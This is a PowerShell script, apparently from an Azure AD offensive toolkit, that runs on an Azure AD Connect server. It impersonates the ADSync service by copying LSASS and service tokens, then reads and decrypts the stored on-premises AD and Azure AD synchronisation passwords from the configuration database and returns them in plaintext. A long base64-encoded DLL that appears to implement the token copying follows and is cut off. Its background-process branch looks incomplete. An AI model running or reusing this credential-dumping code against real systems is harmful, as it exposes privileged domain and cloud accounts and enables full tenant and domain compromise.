function Check-Server
{
    [cmdletbinding()]
    Param(
            [Parameter(Mandatory=$true)]
            [bool]$AsADSync,
            [Parameter(Mandatory=$true)]
            [bool]$force
    )
    process
    {
      
        if($force -ne $true -and (($adSyncService = Get-Service ADSync -ErrorAction SilentlyContinue) -eq $null -or $adSyncService.Status -ne "Running"))
        {
            Write-Error "This command needs to be run on a computer with ADSync running!"
            return $false
        }

       
        $ADSyncLocation = (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\AD Sync").Location
        Add-Type -path "$ADSyncLocation\Bin\mcrypt.dll"

        $ADSyncUser=""
        $CurrentUser = "{0}\{1}" -f $env:USERDOMAIN,$env:USERNAME

        
        try
        {
            $serviceWMI = Get-WmiObject Win32_Service -Filter "Name='ADSync'" -ErrorAction SilentlyContinue
            $ADSyncUser=  $serviceWMI.StartName
            $ver=         ($serviceWMI.PathName.Split('"')[1] | Get-Item).VersionInfo.FileVersion
            $ver2=$ver.split('.')
            if($force -ne $true -and $ver2[0] -eq 1 -and $ver2[1] -ge 4 -and !$AsADSync)
            {
                Write-Warning "ADSync passwords can be read or modified as local administrator only for ADSync version 1.3.xx.xx!"
                Write-Warning "The current version is $ver and access to passwords requires running as ADSync ($ADSyncUser)."
                Write-Warning "Use the -AsADSync $true parameter to try again!"
                return $false
            }
        }
        catch
        {
            Write-Verbose "Could not get WMI info, probably already running as ADSync so skipping the ""elevation"""
            $AsADSync = $false
        }

        
        if($AsADSync)
        {
            
            $SQLclient = new-object System.Data.SqlClient.SqlConnection -ArgumentList (Get-AADConfigDbConnection)
            $SQLclient.Open()
            $SQLclient.Close()
            try
            {
                
                $elevation = [AADInternals.Native]::copyLsassToken() -and [AADInternals.Native]::copyADSyncToken()
            }
            catch
            {
                $elevation = $false
            }

            if($elevation)
            {
                Write-Verbose """Elevation"" to ADSync succeeded!"
                
            }
            else
            {
                Write-Error "Could not change to $ADSyncUser. MUST be run as administrator!"
            }
        }
    }
}


function Get-SyncCredentials
{

    [cmdletbinding()]
    Param(
        [Parameter(Mandatory=$false)]
        [bool]$AsADSync=$true,
        [Parameter(Mandatory=$false)]
        [bool]$AsBackgroundProcess=$true,
        [Parameter(Mandatory=$false)]
        [switch]$AsCredentials,
        [Parameter(Mandatory=$false)]
        [switch]$force
    )
    Process
    {
        # If started as a background process, start the background job script
        if($AsBackgroundProcess)
        {
            Write-Verbose "Starting as a background process."
            Try 
            {
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "powershell.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.CreateNoWindow = $true
                
               
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null

                # Get the return value and convert from JSON string
                $response = $p.StandardOutput.ReadToEnd()
                Write-Verbose "Background process response: $response"
                $retVal =  $response | ConvertFrom-Json

                $p.WaitForExit()
              }
              Catch 
              {
                throw "Could not export credentials using background process."
              }
        }
        else
        {

            # Do the checks
            if((Check-Server -AsADSync $AsADSync -force $force) -eq $false)
            {
               return
            }

            # Read the encrypt/decrypt key settings
            $SQLclient = new-object System.Data.SqlClient.SqlConnection -ArgumentList (Get-AADConfigDbConnection)
            $SQLclient.Open()
            $SQLcmd = $SQLclient.CreateCommand()
            $SQLcmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
            $SQLreader = $SQLcmd.ExecuteReader()
            $SQLreader.Read() | Out-Null
            $key_id = $SQLreader.GetInt32(0)
            $instance_id = $SQLreader.GetGuid(1)
            $entropy = $SQLreader.GetGuid(2)
            $SQLreader.Close()

            # Read the AD configuration data
            $ADConfigs=@()
            $SQLcmd = $SQLclient.CreateCommand()
            $SQLcmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
            $SQLreader = $SQLcmd.ExecuteReader()
            while($SQLreader.Read())
            {
                $ADConfig = $SQLreader.GetString(0)
                $ADCryptedConfig = $SQLreader.GetString(1)
                $ADConfigs += New-Object -TypeName psobject -Property @{"ADConfig" = $ADConfig; "ADCryptedConfig" = $ADCryptedConfig}
            }
            $SQLreader.Close()

            # Read the AAD configuration data
            $SQLcmd = $SQLclient.CreateCommand()
            $SQLcmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE subtype = 'Windows Azure Active Directory (Microsoft)'"
            $SQLreader = $SQLcmd.ExecuteReader()
            $SQLreader.Read() | Out-Null
            $AADConfig = $SQLreader.GetString(0)
            $AADCryptedConfig = $SQLreader.GetString(1)
            $SQLreader.Close()
            $SQLclient.Close()

            # Extract the data
            $attributes=[ordered]@{}
            $attributes["AADUser"]=([xml]$AADConfig).MAConfig.'parameter-values'.parameter[0].'#text'
            $attributes["AADUserPassword"]=""

            try
            {
                # Decrypt config data
                $KeyMgr = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager

                $KeyMgr.LoadKeySet($entropy, $instance_id, $key_id)
                $key = $null
                $KeyMgr.GetActiveCredentialKey([ref]$key)
                $key2 = $null
                $KeyMgr.GetKey(1, [ref]$key2)

                # Extract the encrypted data
                $n=1
                foreach($ADConfig in $ADConfigs)
                {
                    $ADDecryptedConfig = $null
                    $key2.DecryptBase64ToString($ADConfig.ADCryptedConfig, [ref]$ADDecryptedConfig)
                
                    $attributes["ADDomain$n"      ]=([xml]$ADConfig.ADConfig).'adma-configuration'.'forest-login-domain'
                    $attributes["ADUser$n"        ]=([xml]$ADConfig.ADConfig).'adma-configuration'.'forest-login-user'
                    $attributes["ADUserPassword$n"]=([xml]$ADDecryptedConfig).'encrypted-attributes'.attribute.'#text'
                
                    $n++
                }

                $AADDecryptedConfig = $null
                $key2.DecryptBase64ToString($AADCryptedConfig, [ref]$AADDecryptedConfig)
                $attributes["AADUserPassword"]=([xml]$AADDecryptedConfig).'encrypted-attributes'.attribute | Where name -eq "Password" | Select -ExpandProperty "#text"
                $retVal = [PSCustomObject]$attributes
            }
            catch
            {
                Write-Error "Could not load key set!"
            }
        }
        
        # Create credentials objects if requested
        if($AsCredentials)
        {
            $credentials = @()
            # There is only one AAD credentials
            $credentials += New-Object System.Management.Automation.PSCredential($retVal.AADUser, (ConvertTo-SecureString $retVal.AADUserPassword -AsPlainText -Force))

            # Loop through the on-prem AD credentials. Shouldn't be more than 100 :)
            for($n = 1 ; $n -lt 100 ; $n++)
            {
                if(![string]::IsNullOrEmpty($retVal."ADUser$n"))
                {
                   $userName = "$($retVal."ADDomain$n")\$($retVal."ADUser$n")"
                   $credentials += New-Object System.Management.Automation.PSCredential($userName, (ConvertTo-SecureString $retVal."ADUserPassword$n" -AsPlainText -Force))
                }
                else
                {
                    # No more on-prem AD credentials
                    break
                }
            }

            return @($credentials)
        }
        else
        {
            return $retVal
        }
        
    }
}
function Get-AADConfigDbConnection
{
    [cmdletbinding()]
    Param()
    Begin
    {
        # Create the connection string for the configuration database
        $parametersPath =    "HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters"
        $dBServer =          (Get-ItemProperty -Path $parametersPath).Server
        $dBName =            (Get-ItemProperty -Path $parametersPath).DBName
        $dBInstance =        (Get-ItemProperty -Path $parametersPath).SQLInstance
        $connectionString  = "Data Source=$dbServer\$dBInstance;Initial Catalog=$dBName"
    }
    Process
    {
        Write-Verbose "ConnectionString=$connectionString"

        return $connectionString
    }
}

$base64dll = "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AACWAJcC+wTaALwtAAAAAJYAywgWBdwA1C4AAAAAlgAIDyAF3QBUMAAAAACWABsRJwXfAEgxAAAAAJYA8QcwBeIAuDEAAAAAlgAdADcF4wAXMgAAAACGGNcMQQXmADQyAAAAAIYA8Q2gAOkAZDIAAAAAhhjXDBAA6QAAAAAAAADGBbcISgXqAAAAAAADEIYY1wwGAO0AAAABABcOAAACAF4DAAADAMIEAAAEADoDAAAFADsOAAAGADAOAAAHAHAMAAAIANEHAAAJABINAAABABcOAAACAF4DAAADAMIEAAAEABINAgABAN4KAAABAPIQAAACALkOAwADAK8OAAAEAFwDAgAFAB8PAgAGAEgKAgAHADEKAgAIAPoNAgAJAA0KAgAKACEKAgALAN0MAgAMABEFAAABAHcEAAACAAQFAgADALMCAAABAKEEAAACAOANAAADAMEOAgAEAHcEAAABAHcMAAABAFgEAAABAM8OAAACAGUEAAADAEIDACAAAAAAAAABAEoEAAACAMEOAgADAD4EAAABAJ8EAAACAKwEAAADAHUDACAAAAAAAAABAD4EACACAJkNAAADAMYFAAAEAMsLAAAFAAgAAAAGAD0AACAAAAAAAAABAHUPAAABADYEAAACAIkBAgADACEEACAAAAAAAAABAE8DAAACANQKACAAAAAAAAABAHcQAAACAKIMAAADAFYMAAAEAIgFAAAFABUOAAABAHcQAAACACIDAAADAPIQAAAEABUOAAAFAE4IAAABAE4IAAACAKsJAAADAIALAAAEABUOAAABAGAIAAACAIICAAADAAUKAAAEAB0OAAABAGAIAAACAKsJAAADAIICAAAEAPsJAAAFABUOAAABAGAIAAABAPEQAAABAHcQAAACABUOACAAAAAAAAABAHcQAAACANkCAAADAPsJAAAEAL0QAAAFABUOAAAGAPIQAQABAHcQAQACAGcDAQADABUOAgAEAPEQACAAAAAAAAABAPIQAAACABMRAAADAEEFAAAEABUOAwAFAIICAAAGAPsJACAAAAAAAAABAPIQAAACAGAIAAADAAQJAAAEABUOAAAFAIICAAAGAPoJAAABAPIQAAACAKsJAAADAIICAAAEABUOAAABAMQJAAABAIYQACACAJIDAAADABUOAAABAP4LACACALMEAAADABUOAAABAP4LAAACACYRACADAEwFAAAEAAsQAAAFAPEQAAAGAIICAAAHAHsCAAAIABUOAAABAPIQAAACAEERACADAEwFAAAEAAsQAwAFADMQAAAGACoQAAAHAMMPAAAIABUOAAABAPIQACACAA8SAAADACIQAAAEABoQAAAFABUOAAABAPIQAAACABUOAAABAHUPAAABAPIQACACACIQAAADABoQAAAEAKsLACAFADMQAAAGACoQAAAHAMMPAAAIABUOAgABAOkJAAACABkDAAADAAMLAAAEABUOAAABAOkJAgACAE4IAAADAHAPAAAEAGMPAAAFAJsPAAAGAJIPAAAHABUOAAABAGAIAAACACIQAAADABoQAAAEABUOAAABAGAIAAACADMQAAADACoQAAAEABUOAAABAHUPAAACAA4SAgADADMQAAAEACoQAgAFAMMPAAAGABUOAAABAOoJAAACABUOAAABAGAIAAABAN4JAAACAIcDAAADAHwDAAAEALcPAAAFALAPAAAGAHYOAAAHANIQAAAIAMUQAAAJABUOAAABANoEAAABACIDAAACAIIRAAADAOMCEBAEAEEKAAABACIDAAACAOMCAAABACIDAAACAJ0DAAADAL4PAAAEAIIOAAAFAFkKEBAGAAoJAAABAIIRAAACAOMCAAADAL4PAAAEAIIOAAABAIIRAAACAOMCAAABAIIRAAACAOMCAAADAL4PEBAEALgLEBAFAMELAAABAOMCAAACAKgRAAABAN8IAAABAM4EEBACADEDAAABAIIREBACAGgFEBADAH0FAAABAOMCAAABAJ0DEBACAL4PEBADAIIOAAABAAwFAAACAHkDAAADAIIRAAABADQNACABANsIAgACANwPAgADADwQCQDXDAEAEQDXDAYAGQDXDAoAKQDXDBAAMQDXDBAAOQDXDBAAQQDXDBAASQDXDBAAUQDXDBAAWQDXDBAAYQDXDBUAaQDXDBAAcQDXDBAAeQDXDBAAqQDXDBoAsQDXDAYACQHXDCIAEQHXDAYAIQGLEEEAOQGpAEsAOQHxDVEAOQEzCFcAuQDxBF0AuQDsDmQAuQDTA2kAQQHLC20ASQHFDHAAUQEqCHQAWQEjBXkAwQDXDAEAYQHxDZIAaQHPBZgAwQCbEKAAwQDXDAYAcQHaCqUAKQGjEasAKQG+BdkAKQGjEeAAyQBtAxYBgQAqCBsBKQF5Cx8BYQEVADUByQDXDBAAQQHMEX4BSQGmBYQByQDXDJABeQE7D5YBgQF9D5wBDADXDAYAkQEPBMABSQGmBckB4QDXDAYASQGoC